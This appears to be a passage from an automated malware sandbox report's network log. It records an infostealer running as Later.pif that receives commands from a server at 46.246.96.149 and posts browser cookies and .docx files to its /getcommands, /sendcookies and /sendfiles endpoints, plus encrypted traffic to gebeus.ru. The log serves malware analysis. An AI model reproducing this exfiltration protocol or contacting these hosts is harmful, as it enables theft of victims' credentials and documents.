                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72
                                      Data Ascii: idb=e_user
                                      Jul 15, 2024 06:13:24.720376968 CEST419INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:24 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=korvj2003p4u7cpgf15m6u7t5d; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 62 0d 0a 7b 22 70 61 74 68 22 3a 22 22 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: b{"path":""}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      31192.168.2.54974646.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:24.730767012 CEST178OUTPOST /getcommands HTTP/1.1
                                      Content-Type: application/x-www-form-urlencoded
                                      Host: 46.246.96.149
                                      Content-Length: 58
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 30
                                      Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=0
                                      Jul 15, 2024 06:13:25.444513083 CEST497INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:25 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=tucb8ba6hlf9i6m6ucbb6vpcp9; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 35 38 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 2c 22 63 6f 6d 6d 61 6e 64 22 3a 22 62 72 6f 77 73 65 72 73 7c 66 69 6c 65 73 7c 77 61 6c 6c 65 74 73 22 2c 22 70 61 74 68 73 22 3a 22 44 65 73 6b 74 6f 70 2c 44 6f 63 75 6d 65 6e 74 73 7c 2e 74 78 74 2c 2e 64 6f 63 7c 30 3b 22 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 58{"msg":true,"command":"browsers|files|wallets","paths":"Desktop,Documents|.txt,.doc|0;"}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      32192.168.2.54974746.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:25.921644926 CEST480OUTPOST /sendcookies HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 368
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 6e 61 6d 65 3d 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 3c 41 4e 44 3e 6c 6f 67 3d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 46 61 6c 73 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 39 37 38 09 31 50 5f 4a 41 52 09 32 30 32 33 2d 31 30 2d 30 34 2d 31 33 0d 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 09 54 72 75 65 09 2f 09 54 72 75 65 09 31 32 34 30 34 32 37 32 36 39 09 4e 49 44 09 35 31 31 3d 45 66 35 76 50 46 47 77 2d 4d 5a 59 6f 35 68 77 65 2d 30 54 68 41 56 73 6c 62 78 62 6d 76 64 56 5a 77 63 48 6e 71 56 7a 57 48 41 55 31 34 76 35 33 4d 4e 31 56 76 77 76 51 71 38 62 61 59 66 67 32 2d 49 41 74 71 5a 42 56 35 4e 4f 4c 35 72 76 6a 32 4e 57 49 71 72 7a 33 37 37 55 68 4c 64 48 74 4f 67 45 2d 74 4a 61 42 6c 55 42 59 4a 45 68 75 47 73 51 64 71 6e 69 33 6f 54 4a 67 30 62 72 71 76 31 64 6a 64 69 4c 4a 79 76 54 53 55 68 64 4b 2d 63 35 4a 57 61 64 43 53 [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>name=Google Chrome<AND>log=.google.comFalse/True12404279781P_JAR2023-10-04-13.google.comTrue/True1240427269NID511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4<AND>count=2
                                      Jul 15, 2024 06:13:26.615010977 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:26 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=dkgphdc41n5uh5v60k60m4ilp2; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.54974846.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:27.015256882 CEST1228OUTPOST /sendfiles HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 1117
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=FACWLRWHGG.docx<AND>file=FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQO [TRUNCATED]
                                      Jul 15, 2024 06:13:27.709989071 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:27 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=hcv6622t3tdir89p006serm1cu; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.54974946.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:27.837039948 CEST1228OUTPOST /sendfiles HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 1117
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=MQAWXUYAIK.docx<AND>file=MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHSIVQELASLMFLMIGPFTSWZUYAGUCKFCQXXUWMMESTICTHONLUYSPUWOTQKWRRQMUHGZGAAEZOPOKQULFWRPEFDYEONLKPEMDUKCRINZIRUSKDDNYBNBYIIEFYAXNFVFGHEJTHFTUPICAWBET [TRUNCATED]
                                      Jul 15, 2024 06:13:28.531898022 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:28 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=dugh1a4h4ineddn4cc62m1nsfm; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.54975046.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:28.731926918 CEST1236OUTPOST /sendfiles HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 1129
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 58 51 41 43 48 4d 5a 49 48 55 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 58 51 41 43 48 4d 5a 49 48 55 55 4a 4c 4c 57 44 4c 4b 49 48 54 5a 58 46 49 4d 54 49 45 47 47 57 51 57 4f 47 50 47 44 47 4a 43 4e 55 52 42 56 43 4a 51 58 56 42 4e 50 56 54 4f 50 4d 4e 4e 54 54 44 45 47 53 41 54 4d 57 51 56 4a 51 46 50 42 52 5a 59 53 57 58 46 5a 42 52 44 52 54 4d 49 50 58 47 50 59 4f 42 50 54 42 47 42 52 43 4c 4b 4f 42 50 57 45 51 59 4b 53 57 4d 52 5a 53 55 56 4f 55 5a 59 58 50 55 4e 51 52 59 53 47 49 4a 51 59 4e 47 53 51 52 59 48 48 4a 5a 4a 55 4d 51 4a 50 54 41 43 58 4e 42 49 45 44 5a 43 54 43 5a 46 4a 49 58 4b 43 59 43 4b 49 50 5a 4e 56 54 46 42 51 42 48 56 51 50 44 5a 51 52 56 53 55 56 55 52 4d 58 48 4b 45 47 4b 4f 45 5a 45 4b 49 42 4c 4d 56 4a 5a 55 44 45 43 52 45 4f 43 49 50 47 53 46 55 43 54 53 43 45 46 42 47 [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=XQACHMZIHU.docx<AND>file=XQACHMZIHUUJLLWDLKIHTZXFIMTIEGGWQWOGPGDGJCNURBVCJQXVBNPVTOPMNNTTDEGSATMWQVJQFPBRZYSWXFZBRDRTMIPXGPYOBPTBGBRCLKOBPWEQYKSWMRZSUVOUZYXPUNQRYSGIJQYNGSQRYHHJZJUMQJPTACXNBIEDZCTCZFJIXKCYCKIPZNVTFBQBHVQPDZQRVSUVURMXHKEGKOEZEKIBLMVJZUDECREOCIPGSFUCTSCEFBGUVOCNDBATVZGWMVPTZJSFZRHXIRJRCNKGELIWDNZGAMKSBWMWHLFEXGQBOUETVJFOOQXUHVLHCLNPXVMMJAJTHMWAYJLTYJTFGFKQFLSVQPPDXBZGMDPNMFIPCUAIECDYSLACFWPJBZLRMHWQJDDODGYBNCMNPZVZEFOUOYYYZSTZKLXVCNXWPBLBCHTQQEFOILBEJPKRUZJWWDNKGUNAADWZHCOURFFZEJCPBGILFFCNVTANFXLWXQDYJULHEUQGOBNUZUCFIYEITTPKEZQIHPOKWZDMMSUBIQXHUWBBEGGRGQPCKRFMAFMCKBLNPXUXCCXQDHQXPKHVYQWHXEGHICDOZJUCLTBKKZKRKOQAZWXHKAHVKDOFGKTIQHEGCMPYHKLGIDESWNAVASFUCOGCYQQRLWQIWDFFCQYHYHKKPIBOGOKXWOZWCVHKMGTXFXAKYYBZQGZWSMFICJRXGDLJAHPSTMPIAXRZNMJBHJFVZOWDKOKPDQRKIRARJEJMNPCSEWUFHKLELPZWCMWLZTZBFWJTIBXAZBTTJOEGHCLXUZYBYGYULFGJPLUNVJCTDKVUHKFCMCESWXMDLZQKDUWTAECRDBWECXPCHPBCERDAJOGFCHMDGSJLSJJKMJCXPTLKLLKNTYGOHAERGCOCIKXTKCONSVANKBZLA [TRUNCATED]
                                      Jul 15, 2024 06:13:28.731926918 CEST6OUTData Raw: 9d a0 ab 52
                                      Data Ascii: R
                                      Jul 15, 2024 06:13:29.404126883 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:29 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=pbra0kstsk5clnl0i9ifnajeei; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      36192.168.2.549751186.101.193.110801028C:\Windows\explorer.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:28.990973949 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                      Connection: Keep-Alive
                                      Content-Type: application/x-www-form-urlencoded
                                      Accept: */*
                                      Referer: http://kojxnjsmgyh.net/
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                      Content-Length: 363
                                      Host: gebeus.ru
                                      Jul 15, 2024 06:13:28.991024017 CEST363OUTData Raw: 3b 6e 57 19 f1 b9 1e 55 de de c3 04 72 77 7a b7 7e 0a bd 91 62 71 9e 67 0d 7e 72 e6 47 c5 b3 62 ed 56 b5 2e 75 69 23 10 ea 99 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 79 22 fb f4
                                      Data Ascii: ;nWUrwz~bqg~rGbV.ui#?#1|J7 M@NA .[k,vuy"t`DT6sK('|H3_"VXm+/AnL3*cRvyJo[$N)VwCUP']
                                      Jul 15, 2024 06:13:30.064647913 CEST151INHTTP/1.1 404 Not Found
                                      Server: nginx/1.26.0
                                      Date: Mon, 15 Jul 2024 04:13:29 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Connection: close
                                      Data Raw: 03 00 00 00 72 e8 84
                                      Data Ascii: r


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      37192.168.2.54975246.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:29.547022104 CEST1236OUTPOST /sendfiles HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 1130
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 46 41 43 57 4c 52 57 48 47 47 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 46 41 43 57 4c 52 57 48 47 47 55 54 4b 4e 52 52 44 53 51 55 51 4d 5a 43 42 45 59 57 48 49 47 57 51 57 44 58 41 47 57 4a 45 4e 58 4f 5a 57 4f 57 43 43 58 45 53 59 4d 50 49 4a 54 47 51 58 50 52 4f 4a 4d 56 51 50 53 58 47 48 53 59 4d 4f 4e 45 54 48 55 46 5a 5a 5a 57 59 42 4e 4e 57 44 41 4e 52 48 4e 46 47 4e 4d 41 50 58 43 46 46 51 51 44 54 43 49 4d 52 43 4f 48 41 46 49 42 4d 54 5a 42 5a 50 58 53 4d 46 44 59 48 4c 43 54 50 49 54 49 46 54 58 5a 55 44 42 59 54 4a 5a 48 4a 4b 45 4c 4b 59 4c 5a 51 48 51 5a 59 4d 53 42 59 45 46 58 59 49 56 47 54 51 45 57 49 56 44 4a 49 51 54 45 5a 57 4e 44 43 4f 53 57 4f 58 45 59 41 50 4e 51 41 42 49 44 47 59 54 44 4a 56 55 4b 4d 58 59 45 4e 51 4f 58 44 41 54 44 54 4a 56 50 56 5a 5a 4d 48 42 54 4d 43 45 4b [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=FACWLRWHGG.docx<AND>file=FACWLRWHGGUTKNRRDSQUQMZCBEYWHIGWQWDXAGWJENXOZWOWCCXESYMPIJTGQXPROJMVQPSXGHSYMONETHUFZZZWYBNNWDANRHNFGNMAPXCFFQQDTCIMRCOHAFIBMTZBZPXSMFDYHLCTPITIFTXZUDBYTJZHJKELKYLZQHQZYMSBYEFXYIVGTQEWIVDJIQTEZWNDCOSWOXEYAPNQABIDGYTDJVUKMXYENQOXDATDTJVPVZZMHBTMCEKAZAPACJJWDWTDMDDUOUKVMXWLWQJIUBISHPDQERGKUJVZNEQXZLZLPAAWAIISWMNZUCNHVPXDFUMDEQXILTXQAJMAARGKYBBBICJHNOFJVCGSQMBWXMQELPZMSXWNWZOHIKTQHSNOOEOBJZYHKSWSISVNUCPTNDKLJPXFFKNAZWAKYWAQWKPWLPQBKZJOKHWXUBBXWKQFWXTNIZFYWIGTLBHZHKFRJPDBJYRQPQBTZUQVURGNTQJTFZCFBTOGNCSXOZYULXOKVYONRQOTNOMUPVCDBYIRPNYZSLKSNBOWQKKNJMJHNRUWBXYJGSZSPXSONGCMHTNOICXWNYGZZSXUAIERVNFFQNXDQVRWFMTTMSSSOBHILBUKCDGSMNJBQTRQLBDQKVRGXKWZVMFALQRGBPLMGEORKLBYALNGJAXLKGBFGJJGJRUDKBMQEFJXXWMAJRDTIEDANEPUIJCTTDZYEQDJPJIWYDQDRTRUDDZSJLFZYIHKHRWEGVLQCYQAPXOIJCBELZDZEOFPKSIJQMAQMSMXBREQEEHWXGMHEUPNGVSDZAPNVXQJCPLULFQIXRMSFCUNHHUFFJVFNQWNUUXSOMSNJWOYNUHTHGAZSWYOKIKISIGFZEGFZHQIREUWAJLPABARUVHOGZWCJTJIKKPAQXNJIPQCFVNQO [TRUNCATED]
                                      Jul 15, 2024 06:13:29.547022104 CEST6OUTData Raw: 9c 5d ab 52 04
                                      Data Ascii: ]R
                                      Jul 15, 2024 06:13:30.252144098 CEST420INHTTP/1.1 200 OK
                                      Server: nginx/1.18.0 (Ubuntu)
                                      Date: Mon, 15 Jul 2024 04:13:30 GMT
                                      Content-Type: application/json
                                      Transfer-Encoding: chunked
                                      Connection: keep-alive
                                      Vary: Accept-Encoding
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate
                                      Pragma: no-cache
                                      Set-Cookie: PHPSESSID=r68d96c3vgp6dk5ft2shd9hqd1; path=/
                                      Upgrade: h2
                                      Vary: Accept-Encoding
                                      Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: c{"msg":true}0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      38192.168.2.54975346.246.96.149806584C:\Users\user\AppData\Local\Temp\78801\Later.pif
                                      TimestampBytes transferredDirectionData
                                      Jul 15, 2024 06:13:30.403887033 CEST1236OUTPOST /sendfiles HTTP/1.1
                                      Content-Type: application/octet-stream
                                      Host: 46.246.96.149
                                      Content-Length: 1129
                                      Data Raw: 69 64 62 3d 65 5f 75 73 65 72 3c 41 4e 44 3e 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 3c 41 4e 44 3e 66 69 6c 65 6e 61 6d 65 3d 4d 51 41 57 58 55 59 41 49 4b 2e 64 6f 63 78 3c 41 4e 44 3e 66 69 6c 65 3d 4d 51 41 57 58 55 59 41 49 4b 4a 5a 44 51 49 50 49 45 57 4d 4c 53 4b 58 51 44 58 43 53 49 42 54 4f 55 58 43 58 5a 41 51 45 59 4d 46 49 50 55 4b 45 57 44 52 4b 59 58 4d 42 46 41 45 41 49 45 42 59 4c 4a 48 41 4e 4a 44 49 43 4b 56 52 57 52 59 54 4a 5a 4f 57 45 46 46 4a 50 53 53 44 4e 42 54 4d 54 50 49 56 58 53 56 4b 48 59 53 51 55 56 4f 4b 49 49 4b 4f 48 5a 52 54 42 45 41 54 56 4b 44 57 4e 4e 51 42 4d 59 55 47 4b 50 4d 52 48 51 42 41 50 47 42 4f 54 48 52 4f 52 55 4c 43 51 59 41 45 42 4a 59 58 4d 5a 46 5a 58 45 44 4c 56 55 54 4d 58 45 4f 50 4e 55 54 51 44 50 46 44 57 57 4e 4f 50 59 4d 46 44 43 44 4e 55 51 55 51 4c 59 4d 57 4d 4b 4f 4a 5a 4d 52 49 59 42 43 41 46 4a 41 45 46 55 56 54 4f 55 46 42 51 42 52 55 42 57 51 56 47 44 57 50 49 4b [TRUNCATED]
                                      Data Ascii: idb=e_user<AND>hwid=24016a262ebe93762d796917314914c2<AND>filename=MQAWXUYAIK.docx<AND>file=MQAWXUYAIKJZDQIPIEWMLSKXQDXCSIBTOUXCXZAQEYMFIPUKEWDRKYXMBFAEAIEBYLJHANJDICKVRWRYTJZOWEFFJPSSDNBTMTPIVXSVKHYSQUVOKIIKOHZRTBEATVKDWNNQBMYUGKPMRHQBAPGBOTHRORULCQYAEBJYXMZFZXEDLVUTMXEOPNUTQDPFDWWNOPYMFDCDNUQUQLYMWMKOJZMRIYBCAFJAEFUVTOUFBQBRUBWQVGDWPIKRITDALHWQSAPYVARQGQLYXLMNTQSLSPAUIWZRRROVEGNTPLNQITTJYFKNXCKERAVXLSGHLBRKTFPMXSSIBZDONXSKHXZFWONPIPTFGNRIYRMYPZXLVXEJJMAHKCIYWPFDAHGCVFRHUEIHZKBVMRMLFSKMOMDMMQZJJAOFNHFAMIBCLCLZHQCIKLOBZLNSVBVCHDOYIHMAWWJNQHZDGKVCOCIRQOYTUFEWAGZWBPNLJFWAKYETACSEZLMIQNOAAWSGVNBZZZMSSEFVSETBVTSMTSAJHDYWLIBJPQUHPXWOPSVWQVVSLPTYOWJGWLXRJOMQMBZSMWLZZDUJIUHYZLUNSOMJMWEUBWYSZMXVDNUGSZBSFDACOIFWETJRIXVPDMSVMTKEKNHJFFXCTPPDKYDXOUOGJAFSXVENTIMFLXNKBWSOIJAZLZTXZGBBMUATMNGOCOLHIAOOTBENXJLNEBPUYZAWEWHZCOBEUXLNOCBFMFNLCFQRYSEURUEVQSEGVPCVNXYOUEBPWYJVBOVZHHS